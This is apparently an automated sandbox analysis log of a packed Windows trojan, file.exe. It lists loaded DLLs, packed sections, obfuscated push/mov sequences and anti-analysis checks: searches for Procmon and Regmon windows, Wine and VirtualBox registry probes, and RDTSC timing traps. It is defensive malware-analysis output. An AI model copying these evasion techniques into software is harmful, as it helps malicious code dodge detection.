Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A8EB6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB36CC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AA1E05
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A44669
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C5792
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ABD786
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A8A744
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00704A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: bdmyinmd ZLIB complexity 0.9949113333958021
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00723A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\VG4CUKNC.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | Virustotal: Detection: 50%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1813504 > 1048576
Source: file.exe | Static PE information: Raw size of bdmyinmd is bigger than: 0x100000 < 0x1a0e00

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.700000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bdmyinmd:EW;opbnouzp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bdmyinmd:EW;opbnouzp:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00726390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00726390
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c741d should be: 0x1bd421
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: bdmyinmd
Source: file.exe | Static PE information: section name: opbnouzp
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push edx; mov dword ptr [esp], esi (0_2_00AB88AD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push ebp; mov dword ptr [esp], eax (0_2_00AB88E8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push 746344DFh; mov dword ptr [esp], edx (0_2_00AB8929)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push esi; mov dword ptr [esp], edi (0_2_00AB8952)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push edi; mov dword ptr [esp], 78648C60h (0_2_00AB89CE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push 61BA8222h; mov dword ptr [esp], ebp (0_2_00AB89DD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push 7D7324DEh; mov dword ptr [esp], esi (0_2_00AB8A06)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push 470594B5h; mov dword ptr [esp], edx (0_2_00AB8A1B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push 262AE7DBh; mov dword ptr [esp], edx (0_2_00AB8A45)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push edi; mov dword ptr [esp], ecx (0_2_00AB8AD5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push 1A13BCD6h; mov dword ptr [esp], eax (0_2_00AB8B1A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push ecx; mov dword ptr [esp], edx (0_2_00AB8BCD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push 1EDD6F39h; mov dword ptr [esp], ebx (0_2_00AB8C32)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push ebx; mov dword ptr [esp], eax (0_2_00AB8C90)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push ebx; mov dword ptr [esp], edi (0_2_00AB8CF9)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push 7632A820h; mov dword ptr [esp], edi (0_2_00AB8D02)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push 68619282h; mov dword ptr [esp], ecx (0_2_00AB8D67)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push 5AC2F222h; mov dword ptr [esp], edx (0_2_00AB8DBE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB88A3 push 6BC72B71h; mov dword ptr [esp], ebp (0_2_00AB8E58)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 1D656F85h; mov dword ptr [esp], edx0_2_00AB8EF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push edi; mov dword ptr [esp], ecx0_2_00AB8F71
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push eax; mov dword ptr [esp], 7CBFB139h0_2_00AB8FD9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 4B92B0C1h; mov dword ptr [esp], ebx0_2_00AB9048
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push ebx; mov dword ptr [esp], ebp0_2_00AB909C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 30D762E8h; mov dword ptr [esp], eax0_2_00AB90C3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push ebp; mov dword ptr [esp], ecx0_2_00AB910D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 2E6E2ED2h; mov dword ptr [esp], eax0_2_00AB9132
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push edx; mov dword ptr [esp], ecx0_2_00AB9189
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push ebp; mov dword ptr [esp], edx0_2_00AB919D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push edx; mov dword ptr [esp], 253C3860h0_2_00AB9209
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 5F6DC222h; mov dword ptr [esp], edx0_2_00AB9246
              Source: file.exeStatic PE information: section name: bdmyinmd entropy: 7.954445428928977

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-26171
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B054F2 second address: B054F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B065FE second address: B0660C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FABF0F31B46h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B066D2 second address: B066D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B076F6 second address: B076FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B06820 second address: B06827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B076FA second address: B07758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+1247A159h], edx 0x00000010 mov bx, cx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FABF0F31B48h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D2E86h], edi 0x00000035 push 00000000h 0x00000037 mov ebx, esi 0x00000039 xchg eax, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c jns 00007FABF0F31B58h 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B07758 second address: B0775E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B06937 second address: B0693C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0775E second address: B07762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09987 second address: B0998D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0998D second address: B09992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09992 second address: B09998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0AA60 second address: B0AA66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09BB2 second address: B09BC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABF0F31B4Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0AA66 second address: B0AAF5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FABF0D685F8h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 jmp 00007FABF0D685FDh 0x00000028 jnl 00007FABF0D68600h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007FABF0D685F8h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a mov dword ptr [ebp+1247A159h], edx 0x00000050 jmp 00007FABF0D685FAh 0x00000055 push ecx 0x00000056 sbb di, C74Fh 0x0000005b pop ebx 0x0000005c push 00000000h 0x0000005e mov edi, dword ptr [ebp+122D1ABCh] 0x00000064 mov edi, dword ptr [ebp+122D29F8h] 0x0000006a xchg eax, esi 0x0000006b pushad 0x0000006c push esi 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0AAF5 second address: B0AAFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0AAFE second address: B0AB02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09CAA second address: B09CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0BDC9 second address: B0BE48 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FABF0D685F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FABF0D68604h 0x00000011 nop 0x00000012 jmp 00007FABF0D68605h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov ebx, dword ptr [ebp+124554B7h] 0x00000024 push ecx 0x00000025 jp 00007FABF0D685FBh 0x0000002b pop ebx 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 xor dword ptr [ebp+122D187Dh], esi 0x00000039 mov ebx, ecx 0x0000003b mov eax, dword ptr [ebp+122D0049h] 0x00000041 mov dword ptr [ebp+124554B7h], edi 0x00000047 push FFFFFFFFh 0x00000049 mov edi, dword ptr [ebp+122D2B60h] 0x0000004f nop 0x00000050 je 00007FABF0D68600h 0x00000056 pushad 0x00000057 push eax 0x00000058 pop eax 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0BE48 second address: B0BE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0BE54 second address: B0BE5E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FABF0D685F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0CD38 second address: B0CD4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0FB10 second address: B0FB14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0FB14 second address: B0FB1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11BC8 second address: B11BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12BB0 second address: B12C24 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, edx 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FABF0F31B48h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 call 00007FABF0F31B55h 0x0000002d mov ebx, edx 0x0000002f pop ebx 0x00000030 push 00000000h 0x00000032 jmp 00007FABF0F31B4Dh 0x00000037 xchg eax, esi 0x00000038 jmp 00007FABF0F31B56h 0x0000003d push eax 0x0000003e push edx 0x0000003f jl 00007FABF0F31B4Ch 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0FC83 second address: B0FC89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0FD88 second address: B0FDA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12D9C second address: B12DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12DA2 second address: B12DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12DA6 second address: B12DC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jg 00007FABF0D685F6h 0x00000011 jng 00007FABF0D685F6h 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13DE0 second address: B13DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13EAD second address: B13EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13EB1 second address: B13EBA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13EBA second address: B13ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FABF0D685FCh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13ED1 second address: B13ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DE92 second address: B0DEAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0D68602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B14DB7 second address: B14DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B14DBB second address: B14DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABEE3D second address: ABEE43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABEE43 second address: ABEE57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FABF0D685FAh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F7B1 second address: B1F7BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B4Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F7BF second address: B1F7C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F27C second address: B1F283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F3C8 second address: B1F3CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24F50 second address: B24F56 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24F56 second address: B24F5B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24F5B second address: B24F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 je 00007FABF0F31B4Eh 0x0000000e jno 00007FABF0F31B48h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push edi 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24F79 second address: B24F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25136 second address: B25151 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FABF0F31B4Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25151 second address: B25160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABF0D685FBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25160 second address: B251AD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FABF0F31B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FABF0F31B56h 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 push ebx 0x00000019 push esi 0x0000001a pop esi 0x0000001b pop ebx 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 popad 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 pushad 0x00000028 jnl 00007FABF0F31B4Ch 0x0000002e je 00007FABF0F31B4Ch 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B264D3 second address: B264E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABF0D685FDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B264E4 second address: B264FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B53h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CAF0 second address: B2CAF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CF08 second address: B2CF22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FABF0F31B46h 0x0000000a jmp 00007FABF0F31B50h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2D36B second address: B2D371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2D371 second address: B2D37B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FABF0F31B46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2D37B second address: B2D381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
